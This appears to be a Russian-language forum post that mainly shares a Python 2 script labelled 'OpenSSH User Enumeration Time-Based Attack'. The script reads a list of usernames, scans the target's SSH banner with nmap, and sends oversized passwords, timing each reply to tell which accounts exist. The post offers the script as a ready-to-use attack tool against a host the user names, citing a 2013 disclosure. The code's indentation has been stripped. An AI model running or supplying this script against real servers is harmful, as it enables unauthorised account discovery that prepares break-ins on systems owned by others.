https://www.devconsole.info/?p=341
Еще одна подобная уязвимость уже существует года 3 как минимум
[+] Скрипт на питоне
Code:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import paramiko
import socket
import time
import os,sys
import argparse
import subprocess
from IPy import IP
from threading import *
screenLock = Semaphore(value=1)
def sshTime(host,port,user,sock,defTime):
print 'Connecting %s@%s:%d ' % (user,host,int(port))
try:
sock.connect((host,int(port)))
para = paramiko.Transport(sock)
para.local_version="SSH-2.0-Blabla"
except paramiko.SSHException:
print "Unable to connect to host"
exit(1)
try:
para.connect(username=user)
except EOFError,e:
print 'Error: %s' % e
exit(1)
except paramiko.SSHException,e:
print 'Error: %s' % e
exit(1)
#results in a long wait on sshd side, as it needs to calc the password
#only if the user exists
passwd = 'A'*39000
#time measurement
timeStart = int(time.time())
try:
para.auth_password(user,passwd)
except paramiko.AuthenticationException,e:
print e
except paramiko.SSHException,e:
print e
timeDone = int(time.time())
#simple time calculation
timeRes = timeDone-timeStart
if timeRes > defTime:
print 'User: %s exists' % user
ret = user,host,port,timeRes
else:
ret = -1
para.close()
return ret
def sshBanner(host,port):
nport="-p"+port
print "Scaning %s tcp port at %s ..." % (port,host)
try:
scanv = subprocess.Popen(["nmap", "-PN", "-sV", nport,host],stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0]
except OSError:
print "Install nmap: sudo apt-get install nmap"
scanlist=scanv.split()
if 'filtered' in scanlist:
print "Port " + port + " is filtered."
print "Nothing to do."
exit(1)
elif 'closed' in scanlist:
print "Port " + port + " is close."
print "Nothing to do."
exit(1)
else:
print "Port " + port + " is open."
if 'ssh' in scanlist:
index = scanlist.index('ssh')
print "SSH Server Banner ==> %s %s" % (scanlist[index+1], scanlist[index+2])
banner = scanlist[index+1] + " " + scanlist[index+2]
else:
print "Are you sure that it's a ssh server?"
print "Check with \"nmap -PN -sV -p 22 \" if you see something strange."
exit(1)
return banner
def main():
parse = argparse.ArgumentParser(description='OpenSSH User Enumeration Time-Based Attack')
parse.add_argument('-H', action='store', dest='host', help='Host to attack')
parse.add_argument('-p', action='store', dest='port', help='Host port')
parse.add_argument('-L', action='store', dest='ufile', help='User list file')
parse.add_argument('-d', action='store', dest='delay', help='Time delay in seconds')
argus=parse.parse_args()
if argus.host == None:
parse.print_help()
exit
elif argus.port == None:
parse.print_help()
exit
elif argus.ufile == None:
parse.print_help()
exit
elif argus.delay == None:
parse.print_help()
exit
else:
host = argus.host
port = argus.port
defTime = int(argus.delay)
try:
IP(host)
except ValueError:
print "Invalid host address."
exit(1)
try:
userFile = open (argus.ufile,'r')
except IOError:
print "The file %s doesn't exist." % (argus.ufile)
exit(1)
foundUser = []
print """
************************************************** ******************
* OpenSSH User Enumeration Timing Attack *
* *
* http://cureblog.de/openssh-user-enumeration-time-based-attack/ *
* http://seclists.org/fulldisclosure/2013/Jul/88 *
* *
************************************************** ******************
"""
print
banner = sshBanner(host,port)
print
for line in userFile.readlines():
line = line.split("\n")
user = line[0]
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
fUser = sshTime(host,port,user,sock,defTime)
if fUser != -1 and fUser !=None:
foundUser.append(fUser)
sock.close()
if len(foundUser) == 0:
print "No users found. " + banner + " perhaps it's not vulnerable."
else:
print
print "Server version: " + banner
print
print "Users found Time delay in seconds"
print "--------------------------------------"
for entry in foundUser:
if entry != -1:
print entry[0] + " " + str(entry[3])
if __name__=="__main__":
main()
03-22-2025, 08:22 AM
Threaded Mode